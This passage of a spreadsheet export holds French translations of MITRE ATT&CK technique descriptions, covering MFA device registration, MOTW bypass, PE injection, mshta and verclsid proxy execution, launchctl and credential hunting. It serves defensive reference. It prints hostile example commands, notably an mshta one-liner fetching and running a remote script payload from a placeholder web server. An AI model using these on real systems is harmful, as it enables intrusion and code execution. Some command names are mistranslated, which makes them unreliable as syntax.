Les systèmes MFA, tels que Duo ou Okta, permettent aux utilisateurs d’associer des appareils à leurs comptes afin de répondre aux exigences MFA. Un adversaire qui compromet les informations d’identification d’un utilisateur peut inscrire un nouveau périphérique afin de contourner les exigences MFA initiales et d’obtenir un accès permanent à un réseau. (Citation : CISA MFA PrintNightmare)(Citation : DarkReading FireEye SolarWinds) Dans certains cas, le processus d’auto-inscription MFA peut nécessiter uniquement un nom d’utilisateur et un mot de passe pour inscrire le premier appareil du compte ou pour inscrire un appareil à un compte inactif. (Référence : Mandiant APT29 Microsoft 365 2022)
De même, un adversaire disposant d’un accès existant à un réseau peut inscrire un appareil auprès d’Entra ID et/ou de son système de gestion d’appareils, Microsoft Intune, afin d’accéder à des données ou à des ressources sensibles tout en contournant les stratégies d’accès conditionnel. (Citation : AADInternals - Enregistrement du dispositif)(Citation : AADInternals - Contournement d’accès conditionnel)(Référence : Microsoft DEV-0537) 
Les appareils enregistrés dans Entra ID peuvent être en mesure de mener des campagnes de [spearphishing interne](https://attack.mitre.org/techniques/T1534) via des e-mails intra-organisationnels, qui sont moins susceptibles d’être traités comme suspects par le client de messagerie. (Citation : Microsoft - Enregistrement de l’appareil) En outre, un adversaire peut être en mesure d’effectuer une [inondation d’épuisement de service](https://attack.mitre.org/techniques/T1499/002) sur un locataire Entra ID en inscrivant un grand nombre de périphériques. (Citation : AADInternals - BPRT)
https://attack.mitre.org/techniques/T1098/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter d’obtenir une liste des connexions réseau à destination ou en provenance du système compromis auquel ils accèdent actuellement ou à partir de systèmes distants en interrogeant des informations sur le réseau. 
Un adversaire qui accède à un système faisant partie d’un environnement basé sur le cloud peut cartographier des clouds privés virtuels ou des réseaux virtuels afin de déterminer quels systèmes et services sont connectés. Les actions effectuées sont probablement les mêmes types de techniques de découverte selon le système d’exploitation, mais les informations résultantes peuvent inclure des détails sur l’environnement cloud en réseau pertinents pour les objectifs de l’adversaire. Les fournisseurs de cloud peuvent avoir différentes façons de gérer leurs réseaux virtuels. (Référence : Guide Amazon AWS VPC)(Citation : Présentation du réseau virtuel Microsoft Azure)(Citation : Présentation de Google VPC) De même, les adversaires qui accèdent aux périphériques réseau peuvent également effectuer des activités de découverte similaires pour recueillir des informations sur les systèmes et services connectés.
Les utilitaires et les commandes qui acquièrent ces informations incluent [netstat](https://attack.mitre.org/software/S0104), « net use » et « net session » avec [Net](https://attack.mitre.org/software/S0039). Sous Mac et Linux, [netstat](https://attack.mitre.org/software/S0104) et &lt;code&gt;lsof&lt;/code&gt; peuvent être utilisés pour lister les connexions actuelles. &lt;code&gt;WHO -a&lt;/code&gt; et &lt;code&gt;w&lt;/code&gt; peuvent être utilisés pour indiquer quels utilisateurs sont actuellement connectés, de la même manière que « Net Session ». De plus, des fonctionnalités intégrées natives aux périphériques réseau et à l’interface de ligne de commande du périphérique réseau](https://attack.mitre.org/techniques/T1059/008) peuvent être utilisées (par exemple, &lt;code&gt;afficher les sockets IP&lt;/code&gt;, &lt;code&gt;afficher le brief TCP&lt;/code&gt;). (Référence : US-CERT-TA18-106A)
https://attack.mitre.org/techniques/T1049</t>
  </si>
  <si>
    <t>Les adversaires peuvent compromettre l’infrastructure de tiers qui peut être utilisée lors du ciblage. Les solutions d’infrastructure comprennent des serveurs physiques ou cloud, des domaines, des périphériques réseau et des services Web et DNS tiers. Au lieu d’acheter, de louer ou de louer une infrastructure, un adversaire peut compromettre l’infrastructure et l’utiliser pendant d’autres phases de son cycle de vie. (Référence : Mandiant APT1)(Citation : ICANNDomainNameHijacking)(Citation : Talos DNSpionage novembre 2018)(Citation : FireEye EPS Awakens Part 2) De plus, les adversaires peuvent compromettre de nombreuses machines pour former un botnet qu’ils peuvent exploiter.
L’utilisation d’une infrastructure compromise permet aux adversaires de mettre en scène, de lancer et d’exécuter des opérations. Une infrastructure compromise peut aider les opérations de l’adversaire à se fondre dans le trafic considéré comme normal, comme les contacts avec des sites de haute réputation ou de confiance. Par exemple, les adversaires peuvent tirer parti d’une infrastructure compromise (potentiellement également en conjonction avec des [certificats numériques](https://attack.mitre.org/techniques/T1588/004)) pour s’intégrer davantage et soutenir des campagnes de collecte d’informations et/ou de [hameçonnage](https://attack.mitre.org/techniques/T1566). (Citation : FireEye DNS Hijack 2019) De plus, les adversaires peuvent également compromettre l’infrastructure pour prendre en charge les services [Proxy](https://attack.mitre.org/techniques/T1090) et/ou proxyware. (Référence : amnesty_nso_pegasus)(Citation : Sysdig Proxyjacking)
En utilisant une infrastructure compromise, les adversaires peuvent rendre difficile l’identification de leurs actions. Avant le ciblage, les adversaires peuvent compromettre l’infrastructure d’autres adversaires. (Citation : NSA NCSC Turla OilRig)
https://attack.mitre.org/techniques/T1584</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser de formats de fichiers spécifiques pour contourner les contrôles de marquage du Web. Sous Windows, lorsque des fichiers sont téléchargés à partir d’Internet, ils sont marqués avec un flux de données alternatif NTFS (ADS) caché nommé &lt;code&gt;Zone.Identifier&lt;/code&gt; avec une valeur spécifique connue sous le nom de MOTW. (Citation : Microsoft Zone.Identifier 2020) Les fichiers balisés avec MOTW sont protégés et ne peuvent pas effectuer certaines actions. Par exemple, à partir de MS Office 10, si un fichier MS Office a le MOTW, il s’ouvrira en mode protégé. Les exécutables étiquetés avec le MOTW seront traités par Windows Defender SmartScreen qui compare les fichiers avec une liste d’autorisation d’exécutables bien connus. Si le fichier n’est pas connu/approuvé, SmartScreen empêchera l’exécution et avertira l’utilisateur de ne pas l’exécuter. (Citation : Utilisation de VHD par Beek décembre 2020)(Citation : Outflank MotW 2020)(Citation : Intezer Russian APT décembre 2020)
Les adversaires peuvent abuser des fichiers de conteneur tels que des formats de fichiers compressés/d’archive (.arj, .gzip) et/ou d’image disque (.iso, .vhd) pour fournir des charges utiles malveillantes qui peuvent ne pas être étiquetées avec MOTW. Les fichiers conteneur téléchargés à partir d’Internet seront marqués avec MOTW, mais les fichiers qu’ils contiennent ne peuvent pas hériter du MOTW une fois qu’ils ont été extraits et/ou montés. MOTW est une fonctionnalité NTFS et de nombreux fichiers de conteneur ne prennent pas en charge les flux de données alternatifs NTFS. Une fois qu’un fichier conteneur est extrait et/ou monté, les fichiers qu’il contient peuvent être traités comme des fichiers locaux sur le disque et s’exécuter sans protection. (Citation : Utilisation de VHD par Beek décembre 2020)(Citation : Outflank MotW 2020)
https://attack.mitre.org/techniques/T1553/005</t>
  </si>
  <si>
    <t>Les adversaires désactivent le chiffrement matériel dédié d’un périphérique réseau, ce qui peut leur permettre d’exploiter les faiblesses du chiffrement logiciel afin de réduire les efforts nécessaires à la collecte, à la manipulation et à l’exfiltration des données transmises.
De nombreux périphériques réseau, tels que les routeurs, les commutateurs et les pare-feu, effectuent le chiffrement du trafic réseau pour sécuriser la transmission sur les réseaux. Souvent, ces appareils sont équipés d’un matériel de cryptage spécial et dédié pour augmenter considérablement la vitesse du processus de cryptage et pour empêcher toute altération malveillante. Lorsqu’un adversaire prend le contrôle d’un tel appareil, il peut désactiver le matériel dédié, par exemple en utilisant [Modifier l’image système](https://attack.mitre.org/techniques/T1601), forçant l’utilisation d’un logiciel pour effectuer le chiffrement sur les processeurs généraux. Ceci est généralement utilisé en conjonction avec des attaques visant à affaiblir la force du chiffrement dans le logiciel (par exemple, [Réduire l’espace clé](https://attack.mitre.org/techniques/T1600/001)). (Citation : Blog Cisco Legacy Device Attacks)
https://attack.mitre.org/techniques/T1600/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser des mécanismes de pré-démarrage du système d’exploitation pour établir la persistance d’un système. Au cours du processus de démarrage d’un ordinateur, le micrologiciel et divers services de démarrage sont chargés avant le système d’exploitation. Ces programmes contrôlent le flux d’exécution avant que le système d’exploitation ne prenne le contrôle. (citation : Wikipédia Booting)
Les adversaires peuvent écraser les données des pilotes de démarrage ou des microprogrammes tels que le BIOS (Basic Input/Output System) et l’interface UEFI (Unified Extensible Firmware Interface) pour persister sur les systèmes situés à une couche inférieure au système d’exploitation. Cela peut être particulièrement difficile à détecter, car les logiciels malveillants de ce niveau ne seront pas détectés par les défenses logicielles de l’hôte.
https://attack.mitre.org/techniques/T1542</t>
  </si>
  <si>
    <t>Les adversaires peuvent créer une image de conteneur directement sur un hôte pour contourner les défenses qui surveillent la récupération d’images malveillantes à partir d’un registre public. Une demande de &lt;code&gt;build&lt;/code&gt; distante peut être envoyée à l’API Docker qui inclut un fichier Dockerfile qui extrait une image de base standard, telle que alpine, à partir d’un registre public ou local, puis crée une image personnalisée à partir de celle-ci. (citation : image de build docker)
Un adversaire peut tirer parti de cette API de &lt;code&gt;build&lt;/code&gt; pour créer une image personnalisée sur l’hôte qui inclut des programmes malveillants téléchargés à partir de son serveur C2, puis il peut utiliser [Deploy Container](https://attack.mitre.org/techniques/T1610) à l’aide de cette image personnalisée. (Citation : Images Aqua Build sur les hôtes)(Citation : Aqua Security Cloud Native Threat Report juin 2021) Si l’image de base est extraite d’un registre public, les défenses ne détecteront probablement pas l’image comme malveillante puisqu’il s’agit d’une image standard. Si l’image de base réside déjà dans un registre local, l’extraction peut être considérée comme encore moins suspecte puisque l’image est déjà dans l’environnement.
https://attack.mitre.org/techniques/T1612</t>
  </si>
  <si>
    <t>Les adversaires peuvent injecter des exécutables portables (PE) dans les processus afin d’échapper aux défenses basées sur les processus et éventuellement d’élever les privilèges. L’injection PE est une méthode d’exécution de code arbitraire dans l’espace d’adressage d’un processus en direct distinct. 
L’injection PE est généralement effectuée en copiant le code (peut-être sans fichier sur le disque) dans l’espace d’adressage virtuel du processus cible avant de l’invoquer via un nouveau thread. L’écriture peut être effectuée avec des appels d’API Windows natifs tels que &lt;code&gt;VirtualAllocEx&lt;/code&gt; et &lt;code&gt;WriteProcessMemory&lt;/code&gt;, puis appelée avec &lt;code&gt;CreateRemoteThread&lt;/code&gt; ou du code supplémentaire (ex : shellcode). Le déplacement du code injecté introduit l’exigence supplémentaire de fonctionnalité pour remapper les références de mémoire. (Citation : Injection de processus élastique juillet 2017) 
L’exécution de code dans le contexte d’un autre processus peut permettre d’accéder à la mémoire du processus, aux ressources système/réseau et éventuellement à des privilèges élevés. L’exécution par injection PE peut également échapper à la détection des produits de sécurité, car l’exécution est masquée par un processus légitime.
https://attack.mitre.org/techniques/T1055/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser de l’exécution verclsid.exe proxy de code malveillant. Verclsid.exe est connu sous le nom d’hôte de vérification CLSID d’extension et est chargé de vérifier chaque extension de shell avant qu’elle ne soit utilisée par l’Explorateur Windows ou l’environnement de ligne de commande Windows Shell. (Citation : WinOSBite verclsid.exe)
Les adversaires peuvent abuser de verclsid.exe pour exécuter des charges utiles malveillantes. Pour ce faire, exécutez &lt;code&gt;verclsid.exe /S /C {CLSID}&lt;/code&gt;, où le fichier est référencé par un ID de classe (CLSID), un numéro d’identification unique utilisé pour identifier les objets COM. Les charges utiles COM exécutées par verclsid.exe peuvent être en mesure d’effectuer diverses actions malveillantes, telles que le chargement et l’exécution de scriptlets COM (SCT) à partir de serveurs distants (similaire à [Regsvr32](https://attack.mitre.org/techniques/T1218/010)). Étant donné que le binaire peut être signé et/ou natif sur les systèmes Windows, l’exécution par proxy via verclsid.exe peut contourner les solutions de contrôle d’application qui ne tiennent pas compte de son abus potentiel. (Citation : LOLBAS Verclsid)(Référence : Red Canary Verclsid.exe)(citation : BOHOPS abuse du registre COM)(Citation : Nick Tyrer GitHub)
https://attack.mitre.org/techniques/T1218/012</t>
  </si>
  <si>
    <t>Les adversaires peuvent compromettre des comptes avec des services qui peuvent être utilisés lors du ciblage. Pour les opérations intégrant l’ingénierie sociale, l’utilisation d’un persona en ligne peut être importante. Plutôt que de créer et de cultiver des comptes (c’est-à-dire [Établir des comptes](https://attack.mitre.org/techniques/T1585)), les adversaires peuvent compromettre les comptes existants. L’utilisation d’un personnage existant peut engendrer un certain niveau de confiance chez une victime potentielle si elle a une relation ou une connaissance du personnage compromis. 
Il existe diverses méthodes pour compromettre les comptes, telles que la collecte d’identifiants via [Phishing for Information](https://attack.mitre.org/techniques/T1598), l’achat d’identifiants sur des sites tiers, le filtrage par force brute d’identifiants (par exemple, la réutilisation de mots de passe à partir de vidages d’identifiants de violation) ou le paiement d’employés, de fournisseurs ou de partenaires commerciaux pour l’accès aux identifiants. (Citation : AnonHBGary)(Référence : Microsoft DEV-0537) Avant de compromettre des comptes, les adversaires peuvent effectuer une reconnaissance pour éclairer les décisions sur les comptes à compromettre afin de poursuivre leurs opérations.
Les personas peuvent exister sur un seul site ou sur plusieurs sites (ex : Facebook, LinkedIn, Twitter, Google, etc.). Les comptes compromis peuvent nécessiter un développement supplémentaire, notamment le remplissage ou la modification des informations de profil, le développement des réseaux sociaux ou l’intégration de photos.
Les adversaires peuvent exploiter directement des comptes de messagerie compromis pour [Phishing for Information](https://attack.mitre.org/techniques/T1598) ou [Phishing](https://attack.mitre.org/techniques/T1566).
https://attack.mitre.org/techniques/T1586</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser de launchctl pour exécuter des commandes ou des programmes. Launchctl s’interface avec launchd, le cadre de gestion des services pour macOS. Launchctl prend en charge la prise de sous-commandes sur la ligne de commande, de manière interactive ou même redirigée à partir d’une entrée standard. (Citation : Launchctl Man)
Les adversaires utilisent launchctl pour exécuter des commandes et des programmes en tant que [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s ou [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s. Les sous-commandes courantes sont les suivantes : &lt;code&gt;launchctl load&lt;/code&gt;, &lt;code&gt;launchctl unload&lt;/code&gt; et &lt;code&gt;launchctl start&lt;/code&gt;. Les adversaires peuvent utiliser des scripts ou exécuter manuellement les commandes &lt;code&gt;launchctl load -w « %s/Library/LaunchAgents/ %s »&lt;/code&gt; ou &lt;code&gt;/bin/launchctl load&lt;/code&gt; pour exécuter [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s ou [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s.(Citation : Sofacy Komplex Trojan)(Référence : 20 Outils et techniques courants macOS)
https://attack.mitre.org/techniques/T1569/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent compromettre de nombreux systèmes tiers pour former un botnet qui peut être utilisé lors du ciblage. Un botnet est un réseau de systèmes compromis qui peuvent être chargés d’effectuer des tâches coordonnées. (Référence : Norton Botnet) Au lieu d’acheter/louer un botnet auprès d’un service de démarrage/stresseur, les adversaires peuvent créer leur propre botnet en compromettant de nombreux systèmes tiers. (Citation : Imperva DDoS à louer) Les adversaires peuvent également prendre le contrôle d’un botnet existant, par exemple en redirigeant les bots vers des serveurs C2 contrôlés par l’adversaire. (Citation : Dell Dridex octobre 2015) Lorsqu’ils disposent d’un botnet, les adversaires peuvent effectuer des activités de suivi telles que le [phishing](https://attack.mitre.org/techniques/T1566) ou le déni de service distribué (DDoS) à grande échelle.
https://attack.mitre.org/techniques/T1584/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser des scripts ou des interpréteurs de ligne de commande (CLI) intégrés sur les périphériques réseau pour exécuter des commandes et des charges utiles malveillantes. L’interface de ligne de commande est le principal moyen par lequel les utilisateurs et les administrateurs interagissent avec l’appareil afin d’afficher des informations système, de modifier le fonctionnement de l’appareil ou d’effectuer des fonctions de diagnostic et d’administration. Les CLI contiennent généralement différents niveaux d’autorisation requis pour différentes commandes. 
Les interpréteurs de script automatisent les tâches et étendent les fonctionnalités au-delà de l’ensemble de commandes inclus dans le système d’exploitation réseau. L’interface de ligne de commande et l’interpréteur de script sont accessibles via une connexion directe à la console ou par des moyens distants, tels que telnet ou [SSH](https://attack.mitre.org/techniques/T1021/004).
Les adversaires peuvent utiliser l’interface de ligne de commande réseau pour modifier le comportement et le fonctionnement des périphériques réseau. L’interface de ligne de commande peut être utilisée pour manipuler les flux de trafic afin d’intercepter ou de manipuler des données, modifier les paramètres de configuration de démarrage pour charger des logiciels système malveillants ou pour désactiver les fonctionnalités de sécurité ou la journalisation afin d’éviter d’être détecté. (Citation : Cisco Synful Knock Evolution)
https://attack.mitre.org/techniques/T1059/008</t>
  </si>
  <si>
    <t>Les adversaires peuvent rechercher dans l’historique des commandes bash sur les systèmes compromis des informations d’identification stockées de manière non sécurisée. Bash garde une trace des commandes que les utilisateurs tapent sur la ligne de commande avec l’utilitaire « history ». Une fois qu’un utilisateur se déconnecte, l’historique est vidé dans le fichier &lt;code&gt;.bash_history&lt;/code&gt; de l’utilisateur. Pour chaque utilisateur, ce fichier se trouve au même endroit : &lt;code&gt;~/.bash_history&lt;/code&gt;. En règle générale, ce fichier garde une trace des 500 dernières commandes de l’utilisateur. Les utilisateurs tapent souvent des noms d’utilisateur et des mots de passe sur la ligne de commande en tant que paramètres des programmes, qui sont ensuite enregistrés dans ce fichier lorsqu’ils se déconnectent. Les adversaires peuvent en abuser en parcourant le fichier à la recherche d’informations d’identification potentielles. (citation : externe à DA, à la manière d’OS X)
https://attack.mitre.org/techniques/T1552/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent rétrograder ou utiliser une version des fonctionnalités du système qui peut être obsolète, vulnérable et/ou ne prenant pas en charge les contrôles de sécurité mis à jour. Les attaques de rétrogradation tirent généralement parti de la rétrocompatibilité d’un système pour le forcer à passer à des modes de fonctionnement moins sécurisés. 
Les adversaires peuvent rétrograder et utiliser diverses versions moins sécurisées de fonctionnalités d’un système, telles que [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) ou même des protocoles réseau qui peuvent être utilisés de manière abusive pour activer [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) ou [Network Sniffing](https://attack.mitre.org/techniques/T1040). (Citation : Attaque prétorienne de rétrogradation TLS 2014) Par exemple, les versions 5+ de [PowerShell](https://attack.mitre.org/techniques/T1059/001) incluent la journalisation des blocs de script (SBL) qui peut enregistrer le contenu du script exécuté. Toutefois, les adversaires peuvent tenter d’exécuter une version précédente de PowerShell qui ne prend pas en charge SBL dans le but de [Nuire aux défenses](https://attack.mitre.org/techniques/T1562) tout en exécutant des scripts malveillants qui auraient pu être détectés. (Citation : CrowdStrike BGH Ransomware 2021)(Citation : Mandiant BYOL 2018)(Référence : att_def_ps_logging)
De la même manière, les adversaires peuvent cibler le trafic réseau pour passer d’une connexion HTTPS chiffrée à une connexion HTTP non sécurisée qui expose les données réseau en texte clair. (citation : les attaques ciblées de stripping SSL sont réelles)(Citation : Crowdstrike Downgrade)
https://attack.mitre.org/techniques/T1562/010</t>
  </si>
  <si>
    <t>Les adversaires peuvent fournir du contenu malveillant à un démon de service XPC pour l’exécution de code local. macOS utilise les services XPC pour la communication interprocessus de base entre différents processus, par exemple entre le démon de service XPC et les outils d’assistance privilégiés d’applications tierces. Les applications peuvent envoyer des messages au démon de service XPC, qui s’exécute en tant qu’utilisateur root, à l’aide de &lt;code&gt;l’API C&lt;/code&gt; de service XPC de bas niveau ou de l’API &lt;code&gt;NSXPCConnection&lt;/code&gt; de haut niveau afin de gérer des tâches nécessitant des privilèges élevés (telles que les connexions réseau). Les applications sont chargées de fournir la définition du protocole qui sert de modèle pour les services XPC. Les développeurs utilisent généralement les services XPC pour assurer la stabilité des applications et la séparation des privilèges entre le client de l’application et le démon. (Citation : creatingXPCservices)(Citation : Concevoir des démons Apple Dev)
Les adversaires peuvent abuser des services XPC pour exécuter du contenu malveillant. Les demandes d’exécution malveillante peuvent être transmises via le gestionnaire XPC Services de l’application. (Citation : CVMServer Vuln)(citation : Apprendre l’exploitation XPC) Cela peut également inclure l’identification et l’utilisation abusive d’une validation incorrecte du client XPC et/ou d’un nettoyage médiocre des paramètres d’entrée pour effectuer [l’exploitation à des fins d’élévation de privilèges](https://attack.mitre.org/techniques/T1068).
https://attack.mitre.org/techniques/T1559/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser divers moyens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adversaires peuvent utiliser plusieurs méthodes pour effectuer la [virtualisation/évasion du bac à sable](https://attack.mitre.org/techniques/T1497), telles que la recherche d’outils de surveillance de la sécurité (par exemple, Sysinternals, Wireshark, etc.) ou d’autres artefacts système associés à l’analyse ou à la virtualisation. Les adversaires peuvent également vérifier l’activité légitime d’un utilisateur pour déterminer s’il se trouve dans un environnement d’analyse. D’autres méthodes incluent l’utilisation de minuteries de mise en veille ou de boucles dans le code malveillant pour éviter de fonctionner dans un bac à sable temporaire. (Référence : Unité 42 Pirpi juillet 2015)
https://attack.mitre.org/techniques/T1497</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser un service Web externe légitime existant comme moyen de relayer des données vers/depuis un système compromis. Les sites Web populaires, les services cloud et les médias sociaux agissant comme un mécanisme pour C2 peuvent fournir une couverture importante en raison de la probabilité que les hôtes d’un réseau communiquent déjà avec eux avant une compromission. L’utilisation de services courants, tels que ceux proposés par Google, Microsoft ou Twitter, permet aux adversaires de se cacher plus facilement dans le bruit attendu. (Citation : Broadcom BirdyClient Microsoft Graph API 2024) Les fournisseurs de services Web utilisent généralement le cryptage SSL/TLS, ce qui offre aux adversaires un niveau de protection supplémentaire.
L’utilisation de services Web peut également protéger l’infrastructure C2 back-end contre la découverte par l’analyse binaire des logiciels malveillants, tout en permettant la résilience opérationnelle (puisque cette infrastructure peut être modifiée de manière dynamique).
https://attack.mitre.org/techniques/T1102</t>
  </si>
  <si>
    <t>Les adversaires peuvent rechercher dans les systèmes de fichiers locaux et les partages de fichiers distants des fichiers contenant des informations d’identification stockées de manière non sécurisée. Il peut s’agir de fichiers créés par les utilisateurs pour stocker leurs propres informations d’identification, de magasins d’informations d’identification partagés pour un groupe d’individus, de fichiers de configuration contenant des mots de passe pour un système ou un service, ou de fichiers de code source/binaires contenant des mots de passe intégrés.
Il est possible d’extraire des mots de passe à partir de sauvegardes ou de machines virtuelles enregistrées via [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). (Citation : CG 2014) Les mots de passe peuvent également être obtenus à partir des préférences de stratégie de groupe stockées sur le contrôleur de domaine Windows. (Référence : SRD GPP)
Dans les environnements cloud et/ou conteneurisés, les informations d’identification des comptes d’utilisateur et de service authentifiés sont souvent stockées dans des fichiers de configuration et d’informations d’identification locaux. (Citation : Unité 42 Hildegard Malware) Ils peuvent également être trouvés en tant que paramètres des commandes de déploiement dans les journaux de conteneur. (Citation : Unité 42 Daemons Docker non sécurisés) Dans certains cas, ces fichiers peuvent être copiés et réutilisés sur une autre machine ou le contenu peut être lu puis utilisé pour s’authentifier sans avoir besoin de copier de fichiers. (Citation : Specter Ops - Stockage d’informations d’identification dans le cloud)
https://attack.mitre.org/techniques/T1552/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent effectuer des calculs sur les adresses renvoyées dans les résultats DNS pour déterminer le port et l’adresse IP à utiliser pour la commande et le contrôle, plutôt que de se fier à un numéro de port prédéterminé ou à l’adresse IP renvoyée réelle. Un calcul d’adresse IP et/ou de numéro de port peut être utilisé pour contourner le filtrage de sortie sur un canal C2. (Citation : Panda numéroté de Meyers)
L’une des implémentations de [DNS Calculation](https://attack.mitre.org/techniques/T1568/003) consiste à prendre les trois premiers octets d’une adresse IP dans une réponse DNS et à utiliser ces valeurs pour calculer le port pour le trafic de commande et de contrôle. (Citation : Panda numéroté de Meyers)(Citation : Moran 2014)(Citation : Rapid7G20Espionage)
https://attack.mitre.org/techniques/T1568/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser de l’exécution mshta.exe proxy de fichiers .hta malveillants et de Javascript ou VBScript via un utilitaire Windows de confiance. Il existe plusieurs exemples de différents types de menaces exploitant mshta.exe lors de la compromission initiale et pour l’exécution du code (Citation : Cylance Dust Storm) (Citation : Red Canary HTA Abuse Part Deux) (Citation : FireEye Attacks Leveraging HTA) (Citation : Airbus Security Kovter Analysis) (Citation : FireEye FIN7 avril 2017) 
Mshta.exe est un utilitaire qui exécute des fichiers Microsoft HTML Applications (HTA). (citation : application HTML de Wikipédia) Les HTA sont des applications autonomes qui s’exécutent à l’aide des mêmes modèles et technologies qu’Internet Explorer, mais en dehors du navigateur. (Citation : Applications HTML MSDN)
Les fichiers peuvent être exécutés par mshta.exe via un script en ligne : &lt;code&gt;mshta vbscript :Close(Execute(« GetObject(« "script :https[ :]//webserver/payload[.]sct" ») »))&lt;/code&gt;
Ils peuvent également être exécutés directement à partir d’URL : &lt;code&gt;mshta http[ :]//webserver/payload[.]ETS&lt;/code&gt;
Mshta.exe peuvent être utilisés pour contourner les solutions de contrôle d’application qui ne tiennent pas compte de son utilisation potentielle. Étant donné que mshta.exe s’exécute en dehors du contexte de sécurité d’Internet Explorer, il contourne également les paramètres de sécurité du navigateur. (Citation : LOLBAS Mshta)
https://attack.mitre.org/techniques/T1218/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent ajouter des éléments de connexion à exécuter lors de la connexion de l’utilisateur afin d’obtenir la persistance ou d’élever les privilèges. Les éléments de connexion sont des applications, des documents, des dossiers ou des connexions serveur qui sont lancés automatiquement lorsqu’un utilisateur se connecte. (Citation : Ouvrir les éléments de connexion Apple) Les éléments de connexion peuvent être ajoutés via une liste de fichiers partagés ou Service Management Framework. (citation : Ajout d’éléments de connexion) Les éléments de connexion à la liste de fichiers partagés peuvent être définis à l’aide de langages de script tels que [AppleScript](https://attack.mitre.org/techniques/T1059/002), tandis que Service Management Framework utilise l’appel d’API &lt;code&gt;SMLoginItemSetEnabled&lt;/code&gt;.
Les éléments de connexion installés à l’aide de l’outil de levier Service Management Framework &lt;code&gt;lancé&lt;/code&gt; ne sont pas visibles dans les Préférences Système et ne peuvent être supprimés que par l’application qui les a créés. (citation : Ajout d’éléments de connexion)(Citation : SMLoginItemSetEnabled Schroeder 2013) Les éléments de connexion créés à l’aide d’une liste de fichiers partagés sont visibles dans les Préférences Système, peuvent masquer l’application lors de son lancement et sont exécutés via LaunchServices, et non lancés, pour ouvrir des applications, des documents ou des URL sans utiliser le Finder. (Citation : Lancement des services Apple Developer) Les utilisateurs et les applications utilisent des éléments de connexion pour configurer leur environnement utilisateur afin de lancer des services ou des applications couramment utilisés, tels que des applications de messagerie, de chat et de musique.
Les adversaires peuvent utiliser les appels [AppleScript](https://attack.mitre.org/techniques/T1059/002) et [Native API](https://attack.mitre.org/techniques/T1106) pour créer un élément de connexion afin de générer des exécutables malveillants. (Citation : ELC en cours d’exécution au démarrage) Avant la version 10.5 sur macOS, les adversaires pouvaient ajouter des éléments de connexion à l’aide de [AppleScript](https://attack.mitre.org/techniques/T1059/002) pour envoyer des événements Apple au processus « Événements système », qui dispose d’un dictionnaire AppleScript pour manipuler les éléments de connexion. (Citation : Éléments de connexion AE) Les adversaires peuvent utiliser une commande telle que &lt;code&gt;tell application « System Events » pour créer un élément de connexion à la fin avec les propriétés /path/to/executable&lt;/code&gt;. (Citation : Startup Items Eclectic)(Citation : analyse hexed osx.dok 2019)(citation : Ajouter une liste Supprimer les éléments de connexion Apple Script) Cette commande ajoute le chemin d’accès de l’exécutable malveillant à la liste des fichiers d’éléments de connexion située dans &lt;code&gt;~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm&lt;/code&gt;. (Citation : Startup Items Eclectic) Les adversaires peuvent également utiliser des éléments de connexion pour lancer des exécutables qui peuvent être utilisés pour contrôler le système victime à distance ou comme moyen d’obtenir une élévation de privilèges en demandant les informations d’identification de l’utilisateur. (Citation : objsee mac malware 2017)(Citation : CheckPoint Dok)(Citation : objsee netwire backdoor 2019)
https://attack.mitre.org/techniques/T1547/015</t>
  </si>
  <si>
    <t>Les adversaires peuvent télécharger, installer ou configurer d’une autre manière des fonctionnalités qui peuvent être utilisées pendant le ciblage. Pour soutenir ses opérations, un adversaire peut avoir besoin de prendre les capacités qu’il a développées ([Développer des capacités](https://attack.mitre.org/techniques/T1587)) ou obtenues ([Obtenir des capacités](https://attack.mitre.org/techniques/T1588)) et de les mettre en place sur une infrastructure sous son contrôle. Ces capacités peuvent être déployées sur une infrastructure qui a déjà été achetée/louée par l’adversaire ([Acquérir l’infrastructure](https://attack.mitre.org/techniques/T1583)) ou qui a été compromise par celui-ci ([Compromettre l’infrastructure](https://attack.mitre.org/techniques/T1584)). Les fonctionnalités peuvent également être mises en scène sur des services Web, tels que GitHub ou Pastebin, ou sur des offres PaaS (Platform-as-a-Service) qui permettent aux utilisateurs de provisionner facilement des applications. (Citation : Volexity Ocean Lotus novembre 2020)(Citation : Trou d’eau de Dragos Heroku)(Citation : Malwarebytes Heroku Skimmers)(Citation : Redirection Netskope GCP)(Citation : Netskope Cloud Phishing)
La mise en scène des capacités peut aider l’adversaire dans un certain nombre de comportements d’accès initiaux et post-compromission, notamment (mais sans s’y limiter) :
* Mise en scène des ressources Web nécessaires pour effectuer le [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) lorsqu’un utilisateur navigue sur un site. (Citation : FireEye CFR Watering Hole 2012)(Référence : Gallagher 2015)(Citation : ATT ScanBox)
* Mise en scène des ressources web pour une cible de lien à utiliser avec le spearphishing. (Citation : Malwarebytes Silent Librarian octobre 2020)(Citation : Proofpoint TA407 septembre 2019)
* Téléchargement de logiciels malveillants ou d’outils vers un emplacement accessible au réseau d’une victime pour permettre le [Transfert d’outils d’entrée](https://attack.mitre.org/techniques/T1105). (Citation : Volexity Ocean Lotus novembre 2020)
* Installation d’un certificat SSL/TLS précédemment acquis à utiliser pour chiffrer le trafic de commande et de contrôle (ex : [Cryptographie asymétrique](https://attack.mitre.org/techniques/T1573/002) avec [Protocoles Web](https://attack.mitre.org/techniques/T1071/001)). (Citation : DigiCert Install SSL Cert)
https://attack.mitre.org/techniques/T1608</t>
  </si>
  <si>
